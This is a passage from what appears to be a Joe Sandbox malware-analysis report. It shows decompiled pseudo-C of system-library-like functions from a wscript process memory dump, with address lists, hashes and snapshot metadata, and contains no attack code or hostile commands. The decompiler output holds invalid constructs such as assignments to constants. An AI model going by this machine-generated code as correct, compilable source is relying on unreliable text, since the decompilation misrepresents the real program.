												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E059857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0598F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L059677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0597A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L059677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E059896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0595849b
0x0595849b
0x0595849b
0x0595849b
0x0595849d
0x059584a2
0x059584a7
0x059584b1
0x059584d8
0x00000000
0x059584b3
0x059584c4
0x059584c9
0x059584cd
0x059584cf
0x059584cf
0x059584d6
0x059584e6
0x059584e9
0x059584ec
0x059584ef
0x059584f2
0x059584f4
0x059584fc
0x05958501
0x05958506
0x05958509
0x059586e0
0x059586e5
0x059586e8
0x059586ed
0x059586f0
0x059586f2
0x059a9afd
0x059a9b02
0x059584da
0x059584df
0x059584df
0x059586fa
0x059586fd
0x059586fe
0x05958701
0x05958706
0x05958709
0x0595870b
0x00000000
0x00000000
0x05958711
0x05958725
0x05958727
0x0595872a
0x0595872c
0x059a9af0
0x059a9af5
0x05958732
0x05958732
0x05958732
0x05958735
0x05958737
0x05958515
0x05958515
0x05958518
0x0595851d
0x05958523
0x05958527
0x0595852b
0x05958537
0x05958539
0x0595853c
0x0595853e
0x0595868c
0x05958691
0x05958699
0x0595869b
0x05958744
0x05958748
0x059586a1
0x059586a1
0x059586a1
0x059586a4
0x059586a8
0x059a9bdf
0x059a9bdf
0x059586ae
0x059586b0
0x00000000
0x059586b6
0x00000000
0x059a9be9
0x059586b0
0x05958544
0x0595854a
0x0595854d
0x05958551
0x0595876e
0x05958778
0x0595877b
0x05958780
0x05958557
0x05958557
0x0595855d
0x0595855d
0x0595856b
0x0595856e
0x05958570
0x05958573
0x05958576
0x05958576
0x05958579
0x0595857b
0x00000000
0x00000000
0x05958581
0x059585a0
0x059585a2
0x059585a5
0x059585a7
0x059a9b1b
0x059a9b1b
0x0595862e
0x0595862e
0x05958631
0x05958631
0x05958634
0x05958636
0x05958669
0x05958669
0x0595866b
0x059a9bbf
0x059a9bc4
0x059a9bc8
0x059a9bce
0x059a9bce
0x05958671
0x05958671
0x05958674
0x05958676
0x059a9bae
0x059a9bae
0x05958676
0x0595867c
0x0595867e
0x05958688
0x05958688
0x00000000
0x0595867e
0x05958638
0x05958638
0x0595863b
0x0595863e
0x0595863f
0x05958642
0x05958645
0x05958648
0x0595864d
0x059a9b69
0x059a9b6e
0x059a9b7b
0x059a9b81
0x059a9b85
0x059a9b89
0x059a9ba7
0x059a9b8b
0x059a9b91
0x059a9b9a
0x059a9b9f
0x059a9b9f
0x05958788
0x0595878d
0x05958763
0x05958763
0x05958766
0x00000000
0x05958766
0x059a9b70
0x00000000
0x059a9b70
0x05958656
0x0595865a
0x0595865c
0x05958752
0x05958756
0x00000000
0x00000000
0x0595875e
0x00000000
0x0595875e
0x05958662
0x05958662
0x05958662
0x05958666
0x00000000
0x05958666
0x059585b7
0x059585b9
0x059585bc
0x059585bf
0x059585cc
0x059585d1
0x059585d4
0x059585db
0x059585de
0x059585e0
0x059a9b5f
0x00000000
0x059a9b5f
0x059585e6
0x059585ea
0x059586c3
0x059586c5
0x059586c8
0x059586ca
0x059a9b16
0x00000000
0x059a9b16
0x059586d6
0x059585f6
0x059585f6
0x059585f9
0x05958602
0x05958606
0x0595860a
0x0595860b
0x0595860e
0x05958611
0x00000000
0x05958611
0x059585f3
0x00000000
0x059585f3
0x05958619
0x0595861e
0x0595861e
0x05958621
0x05958622
0x05958623
0x05958625
0x0595862c
0x00000000
0x0595873d
0x00000000
0x0595873d
0x05958737
0x0595850f
0x05958512
0x00000000
0x05958512
0x00000000
0x059584d6

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb4530ed1a8977723ead621510e642c9883e69aafb71488d252dac1bb2940d6
Instruction ID: bd393f99262c46b69814847c68732411f6d54fc4608b6cd7ffa058a594017c07
Opcode Fuzzy Hash: ecb4530ed1a8977723ead621510e642c9883e69aafb71488d252dac1bb2940d6
Instruction Fuzzy Hash: 08B1A0B0F04209DFCB15DFE9C984AADBBBAFF84314F244529E806AB245D730A955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0597513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0597513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x5a3d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0598D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E05962280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L05964620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0598F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0595FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x5a3b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0598B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x05975142
0x0597514c
0x05975150
0x05975157
0x05975159
0x0597515e
0x05975165
0x05975169
0x0597516c
0x05975172
0x05975176
0x0597517a
0x0597517a
0x0597517a
0x0597517f
0x059b6d8b
0x059b6d8e
0x059b6d91
0x059b6d95
0x059b6d98
0x059b6d9c
0x059b6da0
0x059b6da3
0x059b6da7
0x059b6e26
0x059b6e26
0x059b6e2a
0x059751f9
0x059751f9
0x059751fe
0x059b6e33
0x059b6e33
0x059b6e39
0x059b6e3d
0x059b6e46
0x059b6e50
0x00000000
0x00000000
0x059b6e52
0x059b6e53
0x059b6e56
0x059b6e5d
0x00000000
0x00000000
0x00000000
0x059b6e5f
0x059b6e67
0x059b6e77
0x059b6e7f
0x059b6e80
0x059b6e88
0x059b6e90
0x059b6e9f
0x059b6ea5
0x059b6ea9
0x059b6eb1
0x059b6ebf
0x00000000
0x00000000
0x059b6ecf
0x059b6ed3
0x00000000
0x00000000
0x059b6edb
0x059b6ede
0x059b6ee1
0x059b6ee8
0x059b6eeb
0x059b6eed
0x059b6ef0
0x059b6ef4
0x059b6ef8
0x059b6efc
0x00000000
0x00000000
0x059b6f0d
0x059b6f11
0x059b6f32
0x059b6f37
0x059b6f3b
0x059b6f3e
0x059b6f41
0x059b6f46
0x00000000
0x00000000
0x059b6f4c
0x059b6f50
0x059b6f50
0x059b6f54
0x059b6f62
0x059b6f65
0x059b6f6d
0x059b6f7b
0x059b6f7b
0x059b6f93
0x059b6f98
0x059b6fa0
0x059b6fa6
0x059b6fb3
0x059b6fb6
0x059b6fbf
0x059b6fc1
0x059b6fd5
0x059b6fda
0x059b6fda
0x059b6fdd
0x059b6fe2
0x059b6fe7
0x059b6feb
0x059b6fef
0x059b6ff3
0x0597520c
0x0597520c
0x0597520f
0x05975215
0x05975234
0x0597523a
0x0597523a
0x05975244
0x05975245
0x05975246
0x05975251
0x05975251
0x059b6f13
0x059b6f17
0x059b6f17
0x059b6f18
0x059b6f1b
0x059b6f1f
0x059b6f23
0x00000000
0x059b6f28
0x05975204
0x05975204
0x05975208
0x00000000
0x05975208
0x05975185
0x05975188
0x0597518a
0x0597518e
0x05975195
0x059b6db1
0x059b6db5
0x059b6db9
0x0597519b
0x0597519b
0x0597519e
0x059751a7
0x059751a9
0x059751a9
0x059751b5
0x059751b8
0x059751bb
0x059751be
0x059751c1
0x059751c5
0x059751c9
0x059751cd
0x059751cd
0x059751d8
0x059751dc
0x059751e0
0x059b6dcc
0x059b6dd0
0x059b6dd5
0x059b6ddd
0x059b6de1
0x059b6de1
0x059b6de5
0x059b6deb
0x059b6df1
0x059b6df7
0x059b6dfd
0x059b6e01
0x059b6e05
0x059b6e09
0x059b6e0d
0x059b6e11
0x059b6e11
0x059751eb
0x059b6e1a
0x059b6e1f
0x059b6e21
0x059b6e23
0x00000000
0x059751f1
0x059751f1
0x00000000
0x059751f1

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70750db769f959553384ef67c3cfe0c0cb77d2829ad5fd325e1ed484ad3fcd22
Instruction ID: 69717bf0c655743f9e9c193f414d6baab30e33e8cc5d035b38c0ce403916c69a
Opcode Fuzzy Hash: 70750db769f959553384ef67c3cfe0c0cb77d2829ad5fd325e1ed484ad3fcd22
Instruction Fuzzy Hash: D6C113756093819FE354CF28C580A6AFBF1BF88304F14496EF8998B352D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 059703E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E059703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x5a3d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E05970548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0598B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0595B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5a37c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E05967D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E05967D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E059C7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05989830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E059C69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5a37c04 != 0) {
						_t118 = _v12;
						_t120 = E059CA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5a37bd8;
						if( *0x5a37bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E059895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E059899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E059C3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0594B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0598AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5a38474 - 3;
										if( *0x5a38474 != 3) {
											 *0x5a379dc =  *0x5a379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E05967D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E05967D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E059C7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5a38708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5a37b00; // 0x0
							asm("ror esi, cl");
							 *0x5a3b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E059895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E05957F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x059703f1
0x059703f7
0x059703f9
0x059703fb
0x059703fd
0x05970400
0x0597040a
0x059b4c7a
0x05970537
0x05970547
0x05970410
0x05970410
0x05970414
0x05970417
0x0597041a
0x05970421
0x05970424
0x0597042b
0x0597043b
0x0597043e
0x0597043f
0x0597043f
0x05970446
0x05970449
0x0597044c
0x0597044f
0x05970459
0x059b4c8d
0x0597045f
0x0597045f
0x0597045f
0x05970467
0x059b4c97
0x059b4c9d
0x059b4ca4
0x059b4caa
0x059b4caf
0x059b4cb1
0x059b4cc3
0x059b4cb3
0x059b4cbc
0x059b4cbc
0x059b4cc8
0x059b4ccb
0x059b4cd7
0x059b4cda
0x059b4cdf
0x059b4cdf
0x059b4ccb
0x059b4ca4
0x0597046d
0x0597046f
0x0597046f
0x05970471
0x05970476
0x0597047a
0x0597047b
0x05970483
0x05970489
0x0597048d
0x00000000
0x00000000
0x059b4ce9
0x059b4cef
0x059b4d22
0x059b4d22
0x00000000
0x059b4d22
0x059b4cf1
0x059b4cf7
0x00000000
0x00000000
0x059b4cf9
0x059b4cff
0x00000000
0x00000000
0x059b4d05
0x059b4d07
0x00000000
0x00000000
0x059b4d0d
0x059b4d0f
0x059b4d14
0x059b4d16
0x00000000
0x00000000
0x059b4d1c
0x059b4d1c
0x05970499
0x05970535
0x05970535
0x00000000
0x05970535
0x059704a6
0x059b4d2c
0x059b4d37
0x059b4d39
0x059b4d3b
0x00000000
0x00000000
0x059b4d41
0x059b4d48
0x05970527
0x0597052b
0x0597052d
0x05970530
0x05970530
0x00000000
0x0597052b
0x059b4d4e
0x059704ac
0x059704ac
0x059704af
0x059704b2
0x059704b7
0x059704b9
0x059704bb
0x059704bd
0x059704bf
0x059704c5
0x059704c9
0x059b4d53
0x059b4d59
0x059b4db9
0x059b4dba
0x059b4dbf
0x059b4dc2
0x059b4dc4
0x059b4dc7
0x059b4dce
0x00000000
0x059b4dce
0x059b4d5b
0x059b4d61
0x00000000
0x00000000
0x059b4d63
0x059b4d69
0x00000000
0x00000000
0x059b4d6b
0x059b4d6e
0x059b4d74
0x059b4d76
0x059b4d7c
0x059b4d7e
0x059b4d84
0x059b4d89
0x059b4d8c
0x059b4d8d
0x059b4d92
0x059b4d95
0x059b4d96
0x059b4d98
0x059b4d9a
0x059b4d9f
0x059b4da4
0x059b4da6
0x059b4da8
0x059b4daf
0x059b4db1
0x059b4db1
0x059b4daf
0x059b4da6
0x059b4d84
0x059b4d7c
0x00000000
0x059b4d74
0x059704d6
0x059b4de1
0x059704dc
0x059704dc
0x059704dc
0x059704e4
0x059b4deb
0x059b4df1
0x059b4df8
0x059b4dfe
0x059b4e03
0x059b4e05
0x059b4e17
0x059b4e07
0x059b4e10
0x059b4e10
0x059b4e1c
0x059b4e1f
0x059b4e35
0x059b4e35
0x059b4e1f
0x059b4df8
0x059704f1
0x059704fa
0x059b4e3f
0x059b4e47
0x059b4e5b
0x059b4e61
0x059b4e67
0x059b4e69
0x059b4e71
0x059b4e73
0x05970500
0x05970500
0x05970500
0x059704fa
0x05970508
0x0597051d
0x0597051d
0x0597051f
0x05970524
0x00000000
0x05970524
0x05970515
0x05970517
0x059b4e7a
0x059b4e7c
0x00000000
0x00000000
0x059b4e85
0x00000000
0x059b4e85
0x00000000
0x05970517

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7a1622311a1917a54b7bab9e1a15fe5de00b0db9d734419665ed7a3228ef95
Instruction ID: 8c901794a38cfed382d4ede6fb889b290f9478834f36cd4bf19dda7086f56ff9
Opcode Fuzzy Hash: 8f7a1622311a1917a54b7bab9e1a15fe5de00b0db9d734419665ed7a3228ef95
Instruction Fuzzy Hash: AE91D631F042189BFF21DB69C948BBD7BAABB41724F050266F955AB2D1E774AD00CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0594C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0594C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x5a3d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E05956D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0598B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
